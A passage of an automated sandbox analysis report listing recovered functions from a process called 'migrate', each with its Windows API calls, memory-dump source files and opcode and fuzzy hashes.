                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBE06D326063259BEA7137699C05B9B76889B527B4F160131FC58A7091DFA0CE4182E1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00115AC2
                                                                                                                                                                                                      • Part of subcall function 0011B505: __EH_prolog.LIBCMT ref: 0011B50A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 81718d43d448af376dd100f0bc2761b61545a6db29a85a4f9290c7aa6c73f574
                                                                                                                                                                                                    • Instruction ID: 9d3c84983ce2bc2086c326397e63996d595f5508baec13f53b4ae7a86713a1e3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81718d43d448af376dd100f0bc2761b61545a6db29a85a4f9290c7aa6c73f574
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E01AF308107A0DAD72AEBB8D0417EDFBE4DF78704F54858DA45663283CBB41B18D7A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 176396367-0
                                                                                                                                                                                                    • Opcode ID: c030b420006b7fb8cd711a3fcb7cdd046e7e86eb58b47ecc1591b8f626aaaa98
                                                                                                                                                                                                    • Instruction ID: c2fec2b53754cb0b49a92b5ad07d96c94a4cb7f18660e463b7f966c9fbd58cfb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c030b420006b7fb8cd711a3fcb7cdd046e7e86eb58b47ecc1591b8f626aaaa98
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADE0D83151025039D22552291C01FEB9AECDFBAB24F14803FF1EDD6181D7D064D682F5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0011A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A6C4
                                                                                                                                                                                                      • Part of subcall function 0011A69B: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A6F2
                                                                                                                                                                                                      • Part of subcall function 0011A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0011A592,000000FF,?,?), ref: 0011A6FE
                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0011A598
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1464966427-0
                                                                                                                                                                                                    • Opcode ID: 1ecbd5b6d310a414eb263ab32f513a2704641d8274d069ef638b4f993872751f
                                                                                                                                                                                                    • Instruction ID: d05600f7124251ad8b39928bac209f76c8d792cddbbfe46bc821ca0a14d69054
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ecbd5b6d310a414eb263ab32f513a2704641d8274d069ef638b4f993872751f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDF0E23100E380AACB6657B48900BCB7F946F2A331F448B09F1FD1209AC37110D89B23
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00120E3D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExecutionStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2211380416-0
                                                                                                                                                                                                    • Opcode ID: fd9c646ba499e1e408e340a28d7421a3f21245f81117d00d49c7e1d1196fb4d2
                                                                                                                                                                                                    • Instruction ID: 67fa665c4c5b8a0195eccb98f9b537c4e66471ca3f1c87071b57e48705d94060
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd9c646ba499e1e408e340a28d7421a3f21245f81117d00d49c7e1d1196fb4d2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1D0C2016050647ADA16732838157FE26268FEA312F0D0135F0455B5C3CB4508C6A2A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0012A62C
                                                                                                                                                                                                      • Part of subcall function 0012A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0012A3DA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1915507550-0
                                                                                                                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                                                    • Instruction ID: f8cdf88a1af1b64a8c01a248c4a76ed59f656a0b606c189f71d4255caf71388b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93D0A930200218BBDF02AB21EC02A7E7AAAFF10340F408021B842C5181EBB1D930A262
APIs
• DloadProtectSection.DELAYIMP ref: 0012E5E3
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: DloadProtectSection
• String ID:
• API String ID: 2203082970-0
APIs
• SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00121B3E), ref: 0012DD92
  • Part of subcall function 0012B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0012B579
  • Part of subcall function 0012B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012B58A
  • Part of subcall function 0012B568: IsDialogMessageW.USER32(000801EA,?), ref: 0012B59E
  • Part of subcall function 0012B568: TranslateMessage.USER32(?), ref: 0012B5AC
  • Part of subcall function 0012B568: DispatchMessageW.USER32(?), ref: 0012B5B6
Similarity
• API ID: Message$DialogDispatchItemPeekSendTranslate
• String ID:
• API String ID: 897784432-0
APIs
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• GetFileType.KERNELBASE(000000FF,001197BE), ref: 001198C8
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: e74db325dd50388f68570c83e94afd38920c92d23571264f05655d86d1d956b0
                                                                                                                                                                                                    • Instruction ID: 8138be5c29914b39c2c893a06bdc65f8774fd759fe9ee9c7caac8c5a4f7fc3c8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e74db325dd50388f68570c83e94afd38920c92d23571264f05655d86d1d956b0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FB012D535D110EC314862493D02C3B03ACC1C1B21331C03EF819C4080EF406C202972
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 231d3fcd70d7ee8e3c5f2eebb3979be294e3ab4102b77e215d0d9ae43078e66e
                                                                                                                                                                                                    • Instruction ID: e6c2d36a02ada7f2d0c128c44352553ea7d02a1b70bdcb5b518898d2b70dad9b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 231d3fcd70d7ee8e3c5f2eebb3979be294e3ab4102b77e215d0d9ae43078e66e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FB012E1359010BC314862053D02C3B02ACC1C2F21331C03EFC59C4080EB40AD201871
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 0a3e1b03b32d6bdc865cbd068bac128555b56fcceab5195264bee533673c8f87
                                                                                                                                                                                                    • Instruction ID: fbd5c65042ca575be990cbdad725c5c788527908a00a13dfeae5e83130592e5d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a3e1b03b32d6bdc865cbd068bac128555b56fcceab5195264bee533673c8f87
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AB012D1359150BC318863053D02C3B02ACC1C1B21331C13EF819C45C0EB406C641871
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 2ec179ce00f172e3a1546ca366962853227610f5c01e1043bc62e5e35b1c22f6
                                                                                                                                                                                                    • Instruction ID: 983b6c6189e88766db198ea7eb0846532bddbf2bfe1aa2467e58b856a0da08ea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ec179ce00f172e3a1546ca366962853227610f5c01e1043bc62e5e35b1c22f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7B012D1359020AC314863053E02C3B02ACC1C1B21331C03EF819C41C0EF516D291871
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 88cf62015fbc3c4c02858155e0aa1e0ca81b4c488bbc977bca8a5ba1d401b818
                                                                                                                                                                                                    • Instruction ID: 69701261bbb8f2d56e8f1163c8e529576b7f290a7fb12cab8ef62551a65d5fb0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88cf62015fbc3c4c02858155e0aa1e0ca81b4c488bbc977bca8a5ba1d401b818
• Instruction Fuzzy Hash: 63B012E1359020AC314862053E02C3B02ACC1C1F21331C03EF819C4080EF416E211871
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 770ae9fc4b4182161cd044f1d9e2a5540e84023cf51284e61eb388f4fa15f2c3
• Instruction ID: 426d9cf5947b634b8949d0eece6c3ae5e203488e085163637236aedbce6987eb
• Opcode Fuzzy Hash: 770ae9fc4b4182161cd044f1d9e2a5540e84023cf51284e61eb388f4fa15f2c3
• Instruction Fuzzy Hash: ABB012E1359010AC314862063D02C3B03ACC1C1F21331C03EF819C4080EB406D201872
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: d9ec978967072f8e8e2b754f5fab29d15dd3848598c9ec2a225f689e8fc6dd6d
• Instruction ID: d5708cefcfc7a903e1772145379426b87871eef6d3d0fa32af094076422731d1
• Opcode Fuzzy Hash: d9ec978967072f8e8e2b754f5fab29d15dd3848598c9ec2a225f689e8fc6dd6d
• Instruction Fuzzy Hash: F5B012E1359110BC318862053D02C3B02ACC1C1F21331C13EF819C4480EB416D601871
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: a4945e5066b39cf3d9cf5ff6571244318a9fbf506fe7d7bcbab794fd4412fd68
• Instruction ID: a009d59fac1910fe48dcb5f25a3e8a1927fa2345692a559929b9176061f382be
• Opcode Fuzzy Hash: a4945e5066b39cf3d9cf5ff6571244318a9fbf506fe7d7bcbab794fd4412fd68
• Instruction Fuzzy Hash: 06B012E135A150BC318863053D02C3B02ADC1C1B21331C13EF819C4480EB406C641871
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
